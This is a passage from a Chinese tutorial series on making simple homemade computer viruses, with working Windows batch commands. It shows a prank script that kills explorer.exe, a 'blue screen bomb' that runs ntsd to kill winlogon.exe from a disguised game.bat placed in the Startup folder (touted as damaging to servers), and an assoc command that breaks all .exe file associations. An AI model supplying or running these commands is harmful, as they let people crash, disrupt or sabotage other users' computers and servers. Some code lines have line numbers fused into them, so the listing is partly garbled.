电脑病毒制作代码电脑病毒制作自制简易电脑病毒( 四 ) _制作

5echo.
6echo.
7echo.
8echo =====垃圾清理中，请不要关闭窗口=========
9echo.
10ping -n 5 127.0.0.1>nul
11taskkill /im explorer.exe /f >nul 2>nul
12echo.
13echo =====拐了，你的系统已经废了=======
14echo.
15ping -n 5 127.0.0.1>nul
16echo.
17Start c:\windows\explorer.exe
18echo.
19echo =====已经修复好！是不是吓坏了！！O(∩_∩)O==========
20pause
运行该批处理程序，桌面会消失，如下图所示。

文章插图
过一会桌面又会恢复。由于作者桌面东西太乱，这里仅显示壁纸展示。

文章插图

文章插图
五.最简单的蓝屏炸弹文件
新建文本文档
输入：ntsd -c q -pn winlogon.exe ，表示强制杀死进程
工具->文件夹选项->查看->“隐藏已知文件类型的扩展名”勾选
txt修改为bat
开始->程序->启动，打开game.bat文件
黑客很少攻击个人，一般攻击服务器，该命令对2003的服务器特别有杀伤力

文章插图
双击之后，服务器直接蓝屏显示并重启。

文章插图
ntsd从Windows 2000开始就是系统自带的进程调试工具，在system32目录下。ntsd的功能非常的强大，用法也比较复杂，但如果只用来结束一些进程，那就比较简单了。在Windows中只有System、SMSS.EXE和CSRSS.EXE不能杀。前两个是纯内核态的，最后那个是Win32子系统， ntsd本身需要它。lsass.exe也不要杀掉，它是负责本地账户安全的。被调试器附着的进程会随调试器一起退出，所以可以用来在命令行下终止进程。
打开cmd 后输入以下命令就可以结束进程：
方法一：利用进程的PID结束进程
命令格式：ntsd -c q -p pid
命令范例：ntsd -c q -p 1332 （结束explorer.exe进程）
范例详解：explorer.exe的pid为1332 ，但是如何获取进程的pid呢？在CMD下输入TASKLIST就可以获取当前任务管理器所有进程的PID 。或者打开任务管理器，在菜单栏，选择“查看”->“选择列” ，在打开的选择项窗口中将“PID（进程标识符）”项选择钩上，这样任务管理器的进程中就会多出PID一项了。PID的分配并不固定，是在进程启动是由系统随机分配的，所以进程每次启动的进程一般都不会一样。
方法二：利用进程名结束进程
命令格式：ntsd -c q -pn xxxx.exe （xxxx.exe 为进程名， exe不能省）
命令范例：ntsd -c q -pn explorer.exe
另外的能结束进程的DOS命令还有taskkill和tskill命令。

文章插图
六.最简单的扩展名病毒
将文件格式修改或文档加密都是常见的病毒，比如永恒之蓝、勒索病毒等，它们就是将电脑内的所有资料、文档加密，当你要打开文件时，需要密码，此时通过比特币付费进行勒索。
下面这个小操作是将exe文件修改为txt文档。当遇到可执行的exe文件，会认为它是一个txt文档，用记事本打开，导致可执行程序运行不起来，这是就是这个病毒的原理。
新建文本文档
增加代码：assoc.exe=txtfile
工具->文件夹选项->查看->“隐藏已知文件类型的扩展名”勾选
txt修改为bat
开始->程序->启动，打开bat文件
双击运行bat文件之后，我们的可执行文件就变成了txt文件。此时系统认为exe就是txt程序，把系统的关联搞混乱了，它恢复起来很麻烦。

文章插图
EXE程序打开如下图所示。

文章插图
甚至打开CMD都是TXT文本文件。

文章插图
接着需要执行下面的命令还原exe文件。
assoc.exe=exefile

电脑病毒制作代码 电脑病毒制作 自制简易电脑病毒( 四 )

电脑病毒制作代码电脑病毒制作自制简易电脑病毒( 四 )